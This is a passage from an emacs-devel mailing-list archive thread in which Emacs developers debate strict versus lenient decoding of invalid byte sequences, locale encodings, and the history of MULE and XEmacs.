hostile than it was back then, and I think other conditions have
changed enough that it's time for another experiment, hopefully with a
little bit of attention to design of user interfaces in advance.

 > We shouldn't do that out of our own initiative based on academic
 > considerations and examples from PHP or whatever.

You think spam, viruses, phishing, buffer overrun exploits, and the
like are "academic considerations"?

They aren't, and the attitude that users can and should take care of
themselves is *not* a selling point in this environment, except for
developers who would rather not deal with complex APIs and worse, the
finicky art of providing convenient, unobtrusive, and yet flexible UI.

Footnotes: 
[1]  And I hope that group is a tiny minority, given the rapid growth
in computer usage in just that decade and a half.  If it turns out
that greybeards like us are the majority of users, that's a sad day
for Emacs and for free software.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  7:59                                                                         ` David Kastrup
@ 2014-10-13  8:32                                                                           ` Eli Zaretskii
  2014-10-13  9:20                                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  8:32 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> From: David Kastrup <dak@gnu.org>
> Cc: eliz@gnu.org,  mhw@netris.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Mon, 13 Oct 2014 09:59:21 +0200
> 
> Syntax highlighting may want to point such things out.  That's perfectly
> fine.

Emacs indeed shows raw bytes in a distinct face.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  8:24                                                                       ` Stephen J. Turnbull
@ 2014-10-13  8:58                                                                         ` David Kastrup
  2014-10-13  9:45                                                                           ` Stephen J. Turnbull
  2014-10-13  9:05                                                                         ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-13  8:58 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>
>  > There's also the case that the application was invoked on a remote
>  > host, and its output is passed via the network (a.k.a. "Tramp").  Not
>  > sure if those 3 cases cover that.
>
> My three cases were intended to cover the "local" case, where the user
> presumably has control of the files on her system.  The case you are
> describing is covered under network streams as far as I'm concerned
> (YMMV, that's just the way I broke things down).
>
>  > > An example of (3) is David's case, with AUCTeX handling of TeX error
>  > > messages containing non-unibyte text.)  AFAIK such applications are
>  > > quite rare nowadays.
>  > 
>  > "Rare" doesn't mean unimportant to users to the degree we can ignore
>  > them.  If we do want to cater to those "rare" cases, the only way of
>  > doing that is maintain a database of programs and their behaviors.
>
> That's my main strategy, yes.  We have `file-coding-system-alist' for
> filename cases, similar features for process and network streams, and
> individual modes such as AUCTeX are developed by hackers who have
> proved themselves able to take care of themselves.

But that's not what happens.  AUCTeX uses the normal defaults.  When
those defaults prove _insufficient_ to do the trick (which happens in
sub-percentages of the total) for finding the corresponding source in a
(normally encoding-correct) buffer of characters by interpreting the
error context messages on a terminal where byte-based linebreaks may
corrupt characters, _then_ the error context message (which came in from
a terminal with an encoding, so no byte stream exists any more) are
reencoded to utf-8, the line break is removed, and the byte stream is
redecoded and matched again to the source file buffer containing
_characters_ in the same encoding as those used for decoding the
terminal.

So the point is that
a) TeX daring to produce error output on its console does not cause
beeps and interruptions
b) I have a fallback strategy for dealing with that kind of "ugh" that
is _not_ covered by the standard fallback strategies but that can be
hand-implemented _because_ there was no information loss.

The alternative would be to create an encoding utf-8-with-bad-linebreaks
and the respective coders/recoders and have that as the terminal
encoding for running TeX.

And I have no doubt that people will say that I should be forced to go
that path since it is the "correct" one.

Except that a single TeX run may very well go across several files with
_different_ encodings, so there really is no single "correct" encoding
for the terminal messages of TeX.

Which means that the current "don't mess with things you have not been
told to mess with" behavior leaves the programmer in the situation to
focus on the _actual_ problem rather than fighting Emacs' preconceptions
about what problem he is allowed to encounter.

> Nevertheless, things are much better today than in the days when Erik
> Naggum declared that "Emacs has a fatal disease, and its name is
> 'MULE'".

Erik was the highest profile programmer/user abandoning Emacs for XEmacs
in order to avoid the consequences of multibyte encodings.  I seem to
remember that he blamed the principle of multibyte encodings rather than
the early buggy MULE implementations (the earliest implementations
worked with byte offsets for buffer and string positions so there was
wagonloads of fallout, but I think he also objected to the performance
implications when closing that problem vector by making buffer and
string positions character-based).

I have no idea which Emacs variant he would be using these days if he
were still around.  It may well be XEmacs since part of his objections
against MULE (which is now pretty unavoidable in XEmacs as well
I _think_) was the manner of the top-down decision-making resulting in
its early inclusion in Emacs when it was not all-that-ready.

> I suppose it would be reasonable to distinguish between Internet
> streams, local network streams (but only if a valid certificate was
> presented, otherwise there's little reason to be confident), and local
> files or processes.  But doing that conveniently and accurately sounds
> like a painstaking task.

The only thing one case sensibly do in stacked problems like this is to
have each level deal with its own problems.  And that means that it
needs to pass on data that is not being processed at its own level.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  8:24                                                                       ` Stephen J. Turnbull
  2014-10-13  8:58                                                                         ` David Kastrup
@ 2014-10-13  9:05                                                                         ` Eli Zaretskii
  2014-10-13 10:05                                                                           ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  9:05 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa,
	monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: dak@gnu.org,
>     rms@gnu.org,
>     handa@gnu.org,
>     mhw@netris.org,
>     dmantipov@yandex.ru,
>     emacs-devel@gnu.org,
>     mikegerwitz@gnu.org,
>     monnier@iro.umontreal.ca
> Date: Mon, 13 Oct 2014 17:24:39 +0900
> 
>  > We shouldn't do that out of our own initiative based on academic
>  > considerations and examples from PHP or whatever.
> 
> You think spam, viruses, phishing, buffer overrun exploits, and the
> like are "academic considerations"?

How are these relevant to this discussion (well, except for the
unspecified "and the like" part)?  What do these have to do with text
encoding and decoding in general, and with invalid byte sequences in
particular?  Let's stay focused on the topic at hand, OK?

> They aren't, and the attitude that users can and should take care of
> themselves is *not* a selling point in this environment, except for
> developers who would rather not deal with complex APIs and worse, the
> finicky art of providing convenient, unobtrusive, and yet flexible UI.

All I said was that I want to hear about real-life experiences with
these dangers, where the attackers were able to exploit the Emacs text
decoding machinery to their advantage.  I know it's probably possible
to concoct a synthetic use case for that (although even that was not
done in this thread), but I want to see _real-life_ stories.  Then we
will have specific scenarios to talk about, rather than general
unnamed risks, and also won't need to argue about whether "this can
happen".

Historically, any real-life risks that were reported on the Emacs
lists were handled and fixed very quickly and without any discussions
as to whether they should be fixed.  Rest assured that the same will
happen with the kinds of risks discussed here -- if and when someone
shows us a real-life use case where these risks materialize on our
watch.

We arrived at the current modus operandi of Emacs wrt text encoding
and decoding through sweat, blood, and tears of several major
releases.  It is neither an incident nor luck that complaints about
these issues are rarely if at all seen on the user support forums or
here, for the past 2 major releases.  Changing that in response to
considerations not backed up by specific user reports would be a grave
mistake.  If the history of Emacs development since v20.1 in this area
teaches us anything, it is that we, the Emacs developers, are not good
enough in making these decisions based on theoretical arguments and
considerations.  Suit yourself, but I, for one, don't want us to make
that mistake again, ever.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  8:32                                                                           ` Eli Zaretskii
@ 2014-10-13  9:20                                                                             ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13  9:20 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>> stephen@xemacs.org
>> Date: Mon, 13 Oct 2014 09:59:21 +0200
>> 
>> Syntax highlighting may want to point such things out.  That's perfectly
>> fine.
>
> Emacs indeed shows raw bytes in a distinct face.

Which probably comes at some cost.  I think at one time it provided some
mouse-over information in an overlay and I seem to remember that this
overlay may even have been the _whole_ difference between, say, a raw
byte 0xa0 and the Unicode character at code point 0xa0.

Making this distinction a part of the encoding rather than of a side
channel like an overlay seems quite smart to me.

Again: the overlay thing is just some vague memory and it might actually
have been in either Emacs or XEmacs.  At any rate, it would appear to
carry a somewhat excessive cost.  Syntax highlighting also comes at a
cost, but at least it only happens on buffers actually being displayed
rather than in the process of strings and buffers employed
programmatically.

For programmatic use, stray undecodable bytes come at the cost of an
additional byte.  That's cheap enough to be acceptable in more than just
exceptional cases.  And I commend Emacs for doing its best for not
prescribing my decisions and workflow by making some viable choices
unnecessarily expensive or hard.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  8:58                                                                         ` David Kastrup
@ 2014-10-13  9:45                                                                           ` Stephen J. Turnbull
  2014-10-13 10:17                                                                             ` Uwe Brauer
  2014-10-13 10:30                                                                             ` David Kastrup
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  9:45 UTC (permalink / raw)
  To: David Kastrup
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

David Kastrup writes:

 > The alternative would be to create an encoding
 > utf-8-with-bad-linebreaks and the respective coders/recoders and
 > have that as the terminal encoding for running TeX.

Actually, Emacs *could* design a sane API where the error handler is
specified separate from the encoding.  This is *much* more important
here than it was with the EOL convention.

 > > Nevertheless, things are much better today than in the days when
 > > Erik Naggum declared that "Emacs has a fatal disease, and its
 > > name is 'MULE'".
 > 
 > Erik was the highest profile programmer/user abandoning Emacs for
 > XEmacs in order to avoid the consequences of multibyte encodings.

If he did, I never heard about it.  ISTR he hated XEmacs worse than he
hated Mule.  I know he stopped following the Emacs mainline, but AFAIK
he either went to a Common Lisp implementation like Hemlock, or rolled
his own based on a pre- Mule version of GNU Emacs, not XEmacs.

 > MULE (which is now pretty unavoidable in XEmacs as well I _think_)

No, XEmacs built fine without Mule as of early summer.  XEmacs 21.5 at
least has limited ability to deal with Unicode without Mule, but I
don't remember exactly how far it goes.  It may be that you're stuck
with Latin 1 characters as the internal repertoire, or it may be able
to deal with Unicode UTFs as long as the stream is limited to a
repertoire contained in a single unibyte character set.  If the
latter, you have to select fonts appropriately since such an XEmacs
knows nothing about non-Unicode character sets other than ASCII.

Of course if you want to deal sensibly with non-ASCII, you need to
build XEmacs with Mule, but there are a lot of American programmers
who don't need that even today.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  9:05                                                                         ` Eli Zaretskii
@ 2014-10-13 10:05                                                                           ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13 10:05 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz,
	monnier

Eli Zaretskii writes:

 > Historically, any real-life risks that were reported on the Emacs
 > lists were handled and fixed very quickly and without any discussions
 > as to whether they should be fixed.

Fine.  I prefer a more proactive approach, and I've explained why.
You don't think the explanations make sense, no problem for me. ;-)




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  9:45                                                                           ` Stephen J. Turnbull
@ 2014-10-13 10:17                                                                             ` Uwe Brauer
  2014-10-13 10:30                                                                             ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: Uwe Brauer @ 2014-10-13 10:17 UTC (permalink / raw)
  To: emacs-devel

>> "Stephen" == Stephen J Turnbull <stephen@xemacs.org> writes:
   > Actually, Emacs *could* design a sane API where the error handler is
   > specified separate from the encoding.  This is *much* more important
   > here than it was with the EOL convention.


   > If he did, I never heard about it.  Istr he hated XEmacs worse than he
   > hated Mule.  I know he stopped following the Emacs mainline, but AFAIK
   > he either went to a Common Lisp implementation like Hemlock, or rolled
   > his own based on a pre- Mule version of GNU Emacs, not XEmacs.

He did not, I recall to have asked him explicitly (I don't remember in
which context) and he said, he would never use Xemacs.


He even published a remove-mule-from-emacs20-survival-kit.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  9:45                                                                           ` Stephen J. Turnbull
  2014-10-13 10:17                                                                             ` Uwe Brauer
@ 2014-10-13 10:30                                                                             ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13 10:30 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > The alternative would be to create an encoding
>  > utf-8-with-bad-linebreaks and the respective coders/recoders and
>  > have that as the terminal encoding for running TeX.
>
> Actually, Emacs *could* design a sane API where the error handler is
> specified separate from the encoding.  This is *much* more important
> here than it was with the EOL convention.
>
>  > > Nevertheless, things are much better today than in the days when
>  > > Erik Naggum declared that "Emacs has a fatal disease, and its
>  > > name is 'MULE'".
>  > 
>  > Erik was the highest profile programmer/user abandoning Emacs for
>  > XEmacs in order to avoid the consequences of multibyte encodings.
>
> If he did, I never heard about it.  ISTR he hated XEmacs worse than he
> hated Mule.  I know he stopped following the Emacs mainline, but AFAIK
> he either went to a Common Lisp implementation like Hemlock, or rolled
> his own based on a pre- Mule version of GNU Emacs, not XEmacs.

At first glance, indeed I find
<URL:http://www.emacswiki.org/ErikNaggum#toc1>, the "multibyte survival
kit" for Emacs.

Here's some discussion involving Erik Naggum and myself in 1997 about
MULE and Emacs 20
<URL:https://groups.google.com/forum/#!topic/comp.emacs/ge7syiq7oy8>.
Interesting historic read.

Erik says in that thread "XEmacs has done this right: offer MULE as an
option at build-time.".  At any rate, it is funny to see that I propose
using an array-of-characters programming model with underlying multibyte
representation there, which is dismissed by Erik as not tenable.

Of course, it is what we _have_ since about Emacs 20.3 or 20.4 or so.

So at any rate: at a cursory search I find nothing supporting my
statement about Erik and XEmacs, but some references that may explain
the direction I misremember.

I also find that I've been more involved with coding sanity issues than
I remember.  Though I am pretty sure not to the degree of contributing
actual code.

>  > MULE (which is now pretty unavoidable in XEmacs as well I _think_)
>
> No, XEmacs built fine without Mule as of early summer.  XEmacs 21.5 at
> least has limited ability to deal with Unicode without Mule, but I
> don't remember exactly how far it goes.  It may be that you're stuck
> with Latin 1 characters as the internal repertoire, or it may be able
> to deal with Unicode UTFs as long as the stream is limited to a
> repertoire contained in a single unibyte character set.  If the
> latter, you have to select fonts appropriately since such an XEmacs
> knows nothing about non-Unicode character sets other than ASCII.
>
> Of course if you want to deal sensibly with non-ASCII, you need to
> build XEmacs with Mule, but there are a lot of American programmers
> who don't need that even today.

Ok, so that state is basically like the situation Erik lauded XEmacs
for.  My personal impression is that the historical
one-size-must-fit-all approach of Emacs has, after the initial pain it
caused, led to a situation and code base that does a reasonable job at
keeping the costs of versatility as well in check as can be expected.
We don't have the "you should have been using other compilation options"
argument to fall back on, so it better should.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  6:02                                                                     ` Eli Zaretskii
@ 2014-10-13 14:55                                                                     ` Paul Eggert
  2014-10-13 17:18                                                                       ` Stephen J. Turnbull
  2014-10-14  2:11                                                                     ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-13 14:55 UTC (permalink / raw)
  To: emacs-devel

Stephen J. Turnbull wrote:
> The file or application is truly local, provided with the OS or
>      created by the user.  In that case on a well-maintained system,
>      the encoding should be valid

It could easily be mixed.  For example, in the Emacs source code the output of 
the shell command "grep -r she *" produces some text that is UTF-8 and some that 
is 8-bit EUC.  So the shell command's output is not valid even though all its 
input files are valid.  This type of thing is not uncommon.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13 14:55                                                                     ` Paul Eggert
@ 2014-10-13 17:18                                                                       ` Stephen J. Turnbull
  2014-10-13 17:24                                                                         ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13 17:18 UTC (permalink / raw)
  To: Paul Eggert; +Cc: emacs-devel

Paul Eggert writes:
 > Stephen J. Turnbull wrote:
 > > The file or application is truly local, provided with the OS or
 > >      created by the user.  In that case on a well-maintained system,
 > >      the encoding should be valid
 > 
 > It could easily be mixed.  For example, in the Emacs source code
 > the output of the shell command "grep -r she *" produces some text
 > that is UTF-8 and some that is 8-bit EUC.  So the shell command's
 > output is not valid even though all its input files are valid.
 > This type of thing is not uncommon.

Not uncommon, but no more (and no less) sensible than "zgrep she
/vmlinuz".  Both commands are useful in some contexts, but neither
command's output should be thought of as "encoded text" in the sense
that any codec I know of can handle and produce useful output for all
of the encodings (or even more than one).

If you're planning further processing you shouldn't allow something as
mechanical as a codec anywhere near that stuff: you should accept it
into a buffer as binary, and do your own conversions based on any
useful heuristics you have.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13 17:18                                                                       ` Stephen J. Turnbull
@ 2014-10-13 17:24                                                                         ` David Kastrup
  2014-10-13 17:49                                                                           ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-13 17:24 UTC (permalink / raw)
  To: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Paul Eggert writes:
>  > Stephen J. Turnbull wrote:
>  > > The file or application is truly local, provided with the OS or
>  > >      created by the user.  In that case on a well-maintained system,
>  > >      the encoding should be valid
>  > 
>  > It could easily be mixed.  For example, in the Emacs source code
>  > the output of the shell command "grep -r she *" produces some text
>  > that is UTF-8 and some that is 8-bit EUC.  So the shell command's
>  > output is not valid even though all its input files are valid.
>  > This type of thing is not uncommon.
>
> Not uncommon, but no more (and no less) sensible than "zgrep she
> /vmlinuz".  Both commands are useful in some contexts, but neither
> command's output should be thought of as "encoded text" in the sense
> that any codec I know of can handle and produce useful output for all
> of the encodings (or even more than one).
>
> If you're planning further processing you shouldn't allow something as
> mechanical as a codec anywhere near that stuff: you should accept it
> into a buffer as binary, and do your own conversions based on any
> useful heuristics you have.

Binary is quite unpractical when you are working in a locale and the
vast majority of output fits it.  Then you want to have things displayed
according to locale and have that stuff which doesn't fit formatted as
some sort of recognizable escape sequence.

And I am mighty glad that Emacs does that without some "if Emacs cannot
be 100% correct it should at least be 100% inconvenient" rule getting in
the way of getting work done.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13 17:24                                                                         ` David Kastrup
@ 2014-10-13 17:49                                                                           ` Stephen J. Turnbull
  2014-10-13 18:04                                                                             ` David Kastrup
  2014-10-13 19:19                                                                             ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13 17:49 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup writes:

 > Binary is quite unpractical when you are working in a locale

The Emacs source tree evidently doesn't *have* a locale in the
relevant sense since it has multiple encodings.

 > and the vast majority of output fits it.  Then you want to have
 > things displayed according to locale and have that stuff which
 > doesn't fit formatted as some sort of recognizable escape sequence.

For Paul's example, I suppose binary would work just fine, since he's
searching for ASCII and Emacs sources are probably over 95% ASCII.

And in *my* locale, the whole locale concept sucks becaues no matter
what locale I choose somewhere between 1/3 and 2/3 of the text (all
perfectly intelligible Japanese) will be unreadable according to that
locale.

The real world is stranger and more dangerous than you imagine.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13 17:49                                                                           ` Stephen J. Turnbull
@ 2014-10-13 18:04                                                                             ` David Kastrup
  2014-10-13 19:19                                                                             ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13 18:04 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > Binary is quite unpractical when you are working in a locale
>
> The Emacs source tree evidently doesn't *have* a locale in the
> relevant sense since it has multiple encodings.
>
>  > and the vast majority of output fits it.  Then you want to have
>  > things displayed according to locale and have that stuff which
>  > doesn't fit formatted as some sort of recognizable escape sequence.
>
> For Paul's example, I suppose binary would work just fine, since he's
> searching for ASCII and Emacs sources are probably over 95% ASCII.
>
> And in *my* locale, the whole locale concept sucks becaues no matter
> what locale I choose somewhere between 1/3 and 2/3 of the text (all
> perfectly intelligible Japanese) will be unreadable according to that
> locale.

And 100% illegible is better?

> The real world is stranger and more dangerous than you imagine.

Apparently.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13 17:49                                                                           ` Stephen J. Turnbull
  2014-10-13 18:04                                                                             ` David Kastrup
@ 2014-10-13 19:19                                                                             ` Eli Zaretskii
  2014-10-14  7:03                                                                               ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13 19:19 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Date: Tue, 14 Oct 2014 02:49:56 +0900
> Cc: emacs-devel@gnu.org
> 
> The Emacs source tree evidently doesn't *have* a locale in the
> relevant sense since it has multiple encodings.

That's not true: we try using UTF-8 wherever possible.  The few files
that don't use that simply cannot.  But they are a tiny minority.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  5:43                                                                   ` Eli Zaretskii
@ 2014-10-14  2:09                                                                     ` Richard Stallman
  2014-10-14  6:24                                                                       ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-14  2:09 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    That distinction is quite blurred in latest Emacs versions.  E.g.,
    shell-command-to-string might call a process on a remote host and
    communicate with it via open-network-stream or some such.  There are
    several interactive commands already that use this feature.

The cases where their arguments for strictness are strongest
are the noninteractive ones that don't show the text to a user
for editing.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  6:02                                                                     ` Eli Zaretskii
  2014-10-13 14:55                                                                     ` Paul Eggert
@ 2014-10-14  2:11                                                                     ` Richard Stallman
  2 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-14  2:11 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Speaking only for myself, no, I mean all octet streams purported to
    be encoded text, network or local.

We can't do that.  That would be intolerable for users, for the reasons
others have explained.

However, the examples people have offered mostly include working in
pipelines with network services.  Those cases involve noninteractive
processing and using the network.  It would be ok in those cases
to be more strict about decoding.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  2:09                                                                     ` Richard Stallman
@ 2014-10-14  6:24                                                                       ` Eli Zaretskii
  2014-10-14  7:48                                                                         ` David Kastrup
  2014-10-15 13:16                                                                         ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  6:24 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Mon, 13 Oct 2014 22:09:37 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
>     That distinction is quite blurred in latest Emacs versions.  E.g.,
>     shell-command-to-string might call a process on a remote host and
>     communicate with it via open-network-stream or some such.  There are
>     several interactive commands already that use this feature.
> 
> The cases where their arguments for strictness are strongest
> are the noninteractive ones that don't show the text to a user
> for editing.

I believe the commands that use shell-command-to-string are a good
example of these cases.  That function is frequently used as
infrastructure to query an external program about something, and the
result is then used, at least in some cases, to decide how to proceed.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13 19:19                                                                             ` Eli Zaretskii
@ 2014-10-14  7:03                                                                               ` Stephen J. Turnbull
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
  2014-10-14 20:03                                                                                 ` Paul Eggert
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-14  7:03 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, emacs-devel

Eli Zaretskii writes:

 > That's not true: we try using UTF-8 wherever possible.  The few files
 > that don't use that simply cannot.

That doesn't seem to be true.  In fact many of the encodings
discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
a few indeed appear to be EUC encodings under an alias (eg,
chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
be encoded in UTF-8 are the Big 5 family -- and that's only if you
demand bug-compatibility.[1]

So "simply cannot" evidently is your way of saying "inconvenient".[2]

Note that because of multiple encodings, in the Emacs tree "grep -r"
is probably just a bug.  It's not that you can't read the foreign
languages in "wrong" encodings.  Rather, if your search key is in one
of those languages, you'll *miss occurances* in the "wrong" encodings.

With your preferred default, most users will live their whole lives
without recognizing the bug.  With a strict default, they have a
fighting chance of learning about it.

Footnotes: 
[1]  Big 5 contains a few duplicated characters (at different code
points), so *as text* those files can be represented in Unicode (no
text information is lost since the characters in question are
identical in all ways except Big 5 code point), although *as binary
files* they may not be roundtrippable to UTF-8 (it depends on which
code point is chosen for the duplicated character).

[2]  The inconvenience is pretty significant, here: you'd lose
diff'ability across the conversion boundary.  Thus only new files are
*required* to use UTF-8 (no diff discontinuity), and conversions of
existing files are presumably done only with great care, if at all.

Still, I would think the benefits of having these files be greppable
(and etags-able!) would outweigh that inconvenience in a very short
period of time (maybe a year?)  Except for documentation files, the
files that need these characters probably don't change much.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:03                                                                               ` Stephen J. Turnbull
@ 2014-10-14  7:41                                                                                 ` Eli Zaretskii
  2014-10-14  7:58                                                                                   ` Eli Zaretskii
  2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
  2014-10-14 20:03                                                                                 ` Paul Eggert
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  7:41 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: dak@gnu.org,
>     emacs-devel@gnu.org
> Date: Tue, 14 Oct 2014 16:03:42 +0900
> 
> Eli Zaretskii writes:
> 
>  > That's not true: we try using UTF-8 wherever possible.  The few files
>  > that don't use that simply cannot.
> 
> That doesn't seem to be true.  In fact many of the encodings
> discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
> a few indeed appear to be EUC encodings under an alias (eg,
> chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
> be encoded in UTF-8 are the Big 5 family -- and that's only if you
> demand bug-compatibility.[1]

First, you missed the file-local variables (the pattern you used with
Grep will only find the cookies on the first line).  Second, you
missed file-coding-system-alist, auto-coding-alist, and
auto-coding-regexp-alist, which set defaults for some files that
therefore no longer need to be explicitly stated in the file.

So please believe me when I say that the files encoded in anything
that isn't UTF-8 are those where using UTF-8 was impossible for some
specific reason (not the reasons you mention above).  You can look up
the related discussions in our list archives.

Btw, to find out how many of our files are in UTF-8 and how many
aren't, I would suggest to use tools that can explicitly tell the
encoding, rather than rely on Grep and on whatever you remember are
the ways of specifying a file's encoding.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  6:24                                                                       ` Eli Zaretskii
@ 2014-10-14  7:48                                                                         ` David Kastrup
  2014-10-15 13:16                                                                         ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-14  7:48 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Mon, 13 Oct 2014 22:09:37 -0400
>> From: Richard Stallman <rms@gnu.org>
>> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
